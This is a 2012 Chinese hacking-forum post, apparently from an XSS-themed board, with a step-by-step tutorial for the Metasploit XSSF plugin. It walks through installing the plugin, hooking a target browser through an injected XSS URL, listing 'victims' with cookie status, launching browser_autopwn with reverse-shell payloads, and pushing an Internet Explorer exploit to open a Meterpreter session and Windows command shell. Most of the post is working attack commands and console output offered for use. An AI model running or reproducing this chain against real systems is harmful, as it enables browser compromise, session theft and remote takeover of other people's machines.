切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
19 Metasploit XSSF攻击插件的利用[复制链接]
发表于 2012-8-6 15:58:48 | 显示全部楼层 |!read_mode!
#最新版本的不支持鸟 请用BT5 R1中MSF的测试
安装xssf
  1. root@Dis9Team:~# cd /tmp
  2. root@Dis9Team:/tmp# wget xssf.googlecode.com/files/XSSF-2.1.tar
复制代码
复制到METASPLOIT目录
  1. root@Dis9Team:/tmp# mkdir 1
  2. root@Dis9Team:/tmp# mv XSSF-2.1.tar 1
  3. root@Dis9Team:/tmp# cd 1/
  4. root@Dis9Team:/tmp/1# tar xf XSSF-2.1.tar
  5. root@Dis9Team:/tmp/1# ls
  6. data  lib  modules  plugins  README_XSSF  XSSF-2.1.tar
  7. root@Dis9Team:/tmp/1# cp -rf * /pen/msf3/
  8. root@Dis9Team:/tmp/1# rm /pen/msf3/XSSF-2.1.tar
  9. root@Dis9Team:/tmp/1#
复制代码
然后运行msfupdate 不然找不到XSSF插件
载入xssf

启动METASPLOIT并且链接数据库

  1. msf > db_connect msf3:123456@127.0.0.1/msf3
复制代码
  1. msf > load xssf

  2. __  __     ______     ______     ______
  3. /\_\_\_\   /\  ___\   /\  ___\   /\  ___\
  4. \/_/\_\/_  \ \___  \  \ \___  \  \ \  __\
  5.   /\_\/\_\  \/\_____\  \/\_____\  \ \_\
  6.   \/_/\/_/   \/_____/   \/_____/   \/_/     Cross-Site Scripting Framework
  7.                                           Ludovic Courgnaud - CONIX Security

  8. [+] Server started : http://192.168.56.101:8888/

  9. [*] Please, inject 'http://192.168.56.101:8888/loop' resource in an XSS
  10. [*] Successfully loaded plugin: XSSF如果IP不是你外网IP请修改/opt/metasploit3/msf3/plugins/xssf.rb 吧0,0,0,0换成你的外网IP
  11. 然后让目标机xss “http://192.168.56.101:8888/loop”
复制代码

查看xss会话

  1. msf > xssf_victims

  2. Victims
  3. =======

  4. id  xssf_server_id  active  ip            interval  browser_name       browser_version  cookie
  5. --  --------------  ------  --            --------  ------------       ---------------  ------
  6. 1   1               true    192.168.56.1  2         Internet Explorer  6.0              YES

  7. [*] Use xssf_information [VictimID] to see more information about a victimtrue
复制代码

链接xss会话

  1. msf > xssf_information 1

  2. INFORMATION ABOUT VICTIM 1
  3. ============================
  4. IP ADDRESS      : 192.168.56.1
  5. ACTIVE          : TRUE
  6. FIRST REQUEST   : Tue Jul 19 23:30:25 UTC 2011
  7. LAST REQUEST    : Tue Jul 19 23:31:17 UTC 2011
  8. CONNECTION TIME : 52.0 seconds
  9. BROWSER NAME    : Internet Explorer
  10. BROWSER VERSION : 6.0
  11. OS NAME         : Windows
  12. OS VERSION      : XP
  13. ARCHITECTURE    : ARCH_X86
  14. LOCATION        : file:///C:/Documents and Settings/dis9team/妗棰/xss.htm
  15. COOKIES ?       : YES
  16. RUNNING ATTACK  : NONE
复制代码
如何取得系统权限:使用METASPLOIT模块自动创建一些浏览器漏洞 注意端口不能和xssf插件端口相同
  1. msf > use auxiliary/server/browser_autopwn
  2. msf auxiliary(browser_autopwn) > show options

  3. Module options:

  4.    Name        Current Setting  Required  Description
  5.    ----        ---------------  --------  -----------
  6.    LHOST                        yes       The IP address to use for reverse-connect payloads
  7.    SRVHOST     0.0.0.0          yes       The local host to listen on.
  8.    SRVPORT     8080             yes       The local port to listen on.
  9.    SSL         false            no        Negotiate SSL for incoming connections
  10.    SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  11.    URIPATH                      no        The URI to use for this exploit (default is random)

  12. msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
  13. LHOST => 192.168.56.101
  14. msf auxiliary(browser_autopwn) > set SRVHOST 192.168.56.101
  15. SRVHOST => 192.168.56.101
  16. msf auxiliary(browser_autopwn) > set SRVPORT 8081
  17. SRVPORT => 8081
  18. msf auxiliary(browser_autopwn) > exploit
  19. msf auxiliary(browser_autopwn) > exploit
  20. [*] Auxiliary module execution completed

  21. [*] Starting exploit modules on host 192.168.56.101...
  22. [*] ---

  23. [*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
  24. [*] Using URL: http://192.168.56.101:8081/QlQp2UFx8EADO
  25. [*] Server started.
  26. msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
  27. [*] Using URL: http://192.168.56.101:8081/pqDNRyLmHuA
  28. [*] Server started.
  29. [*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
  30. [*] Using URL: http://192.168.56.101:8081/kXVd9wNJ7
  31. [*] Server started.
  32. [*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
  33. [*] Using URL: http://192.168.56.101:8081/zNNqGn8p
  34. [*] Server started.
  35. [*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
  36. [*] Using URL: http://192.168.56.101:8081/nZqqJnbK17P2Uu
  37. [*] Server started.
  38. [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
  39. [*] Using URL: http://192.168.56.101:8081/l45IFo
  40. [*] Server started.
  41. [*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
  42. [*] Using URL: http://192.168.56.101:8081/4uYjQ9Cd
  43. [*] Server started.
  44. [*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
  45. [*] Using URL: http://192.168.56.101:8081/jUnB2WdlVh
  46. [*] Server started.
  47. [*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
  48. [*] Using URL: http://192.168.56.101:8081/w3xxrTDcW1D
  49. [*] Server started.
  50. [*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
  51. [*] Using URL: http://192.168.56.101:8081/nf21OPGpG4
  52. [*] Server started.
  53. [*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
  54. [*] Using URL: http://192.168.56.101:8081/C7HBuD
  55. [*] Server started.
  56. [*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
  57. [*] Using URL: http://192.168.56.101:8081/GpI7DbKJ2wp5kS
  58. [*] Server started.
  59. [*] Starting exploit windows/browser/java_basicservice_impl with payload windows/meterpreter/reverse_tcp
  60. [-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
  61. [-] Failed to start exploit module windows/browser/java_basicservice_impl
  62. [*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
  63. [*] Using URL: http://192.168.56.101:8081/xFm6pSwb
  64. [*] Server started.
  65. [*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
  66. [*] Using URL: http://192.168.56.101:8081/yVJcsYOtv
  67. [*] Server started.
  68. [*] Starting exploit windows/browser/ms10_xxx_ie_css_clip with payload windows/meterpreter/reverse_tcp
  69. [*] Using URL: http://192.168.56.101:8081/JaT9yvjsEik
  70. [*] Server started.
  71. [*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
  72. [*] Using URL: http://192.168.56.101:8081/1t4f8o9
  73. [*] Server started.
  74. [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
  75. [*] Starting handler for generic/shell_reverse_tcp on port 6666
  76. [*] Started reverse handler on 192.168.56.101:3333
  77. [*] Starting handler for java/meterpreter/reverse_tcp on port 7777
  78. [*] Started reverse handler on 192.168.56.101:6666
  79. [*] Starting the payload handler...
  80. [*] Starting the payload handler...
  81. [*] Started reverse handler on 192.168.56.101:7777
  82. [*] Starting the payload handler...

  83. [*] --- Done, found 16 exploit modules

  84. [*] Using URL: http://192.168.56.101:8081/Xy5LvGuPst
  85. [*] Server started.
复制代码

查看可以利用的漏洞
  1. msf auxiliary(browser_autopwn) > jobs

  2. Jobs
  3. ====

  4.   Id  Name
  5.   --  ----
  6.   0   Auxiliary: server/browser_autopwn
  7.   1   Exploit: multi/browser/firefox_escape_retval
  8.   2   Exploit: multi/browser/java_calendar_deserialize
  9.   3   Exploit: multi/browser/java_trusted_chain
  10.   4   Exploit: multi/browser/mozilla_compareto
  11.   5   Exploit: multi/browser/mozilla_navigatorjava
  12.   6   Exploit: multi/browser/opera_configoverwrite
  13.   7   Exploit: multi/browser/opera_historysearch
  14.   8   Exploit: osx/browser/safari_metadata_archive
  15.   9   Exploit: windows/browser/apple_quicktime_marshaled_punk
  16.   10  Exploit: windows/browser/apple_quicktime_rtsp
  17.   11  Exploit: windows/browser/apple_quicktime_smil_debug
  18.   12  Exploit: windows/browser/ie_createobject
  19.   13  Exploit: windows/browser/ms03_020_ie_objecttype
  20.   14  Exploit: windows/browser/ms10_018_ie_behaviors
  21.   15  Exploit: windows/browser/ms10_xxx_ie_css_clip
  22.   16  Exploit: windows/browser/winzip_fileview
  23.   17  Exploit: multi/handler
  24.   18  Exploit: multi/handler
  25.   19  Exploit: multi/handler根据你目标的操作系统选择利用模块
复制代码

xssf_exploit 1 12 第一个数字是xss会话 第二个数字是浏览器漏洞编号
  1. msf auxiliary(browser_autopwn) > xssf_exploit 1 12
  2. [*] Searching Metasploit launched module with JobID = '12'...
  3. [+] A running exploit exists : 'Exploit: windows/browser/ie_createobject'
  4. [*] Exploit execution started, press [CTRL + C] to stop it !

  5. [*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:44018...

  6. [+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '4'
  7. [+] Remaining victims to attack : NONE
  8. [*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:51709...
  9. [*] Sending EXE payload to 192.168.56.101:60903...
  10. [*] Sending stage (749056 bytes) to 192.168.56.1
  11. [*] Meterpreter session 1 opened (192.168.56.101:3333 -> 192.168.56.1:37151) at Tue Jul 19 23:42:03 -0400 2011
  12. [*] Session ID 1 (192.168.56.101:3333 -> 192.168.56.1:37151) processing InitialAutoRunScript 'migrate -f'
  13. [*] Current server process: njoFrATVcA.exe (1728)
  14. [*] Spawning a notepad.exe host process...
  15. [*] Migrating into process ID 1092
  16. [*] New server process: notepad.exe (1092)

  17. ^C[-] Exploit interrupted by the console user
  18. msf auxiliary(browser_autopwn) > sessions

  19. Active sessions
  20. ===============

  21.   Id  Type                   Information                                 Connection
  22.   --  ----                   -----------                                 ----------
  23.   1   meterpreter x86/win32  DIS9TEAM-7A9CFB\dis9team @ DIS9TEAM-7A9CFB  192.168.56.101:3333 -> 192.168.56.1:37151

  24. msf auxiliary(browser_autopwn) > sessions -i 1
  25. [*] Starting interaction with 1...

  26. meterpreter > shell
  27. Process 5504 created.
  28. Channel 1 created.
  29. Microsoft Windows XP [版本 5.1.2600]
  30. (C) 版权所有 1985-2001 Microsoft Corp.

  31. C:\Documents and Settings\dis9team\桌面>
复制代码
完毕




操千曲而后晓声,观千剑而后识器。
发表于 2016-1-21 22:53:43 | 显示全部楼层
酱油党  不让看?

代码区

GMT+8, 2020-10-31 00:46

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部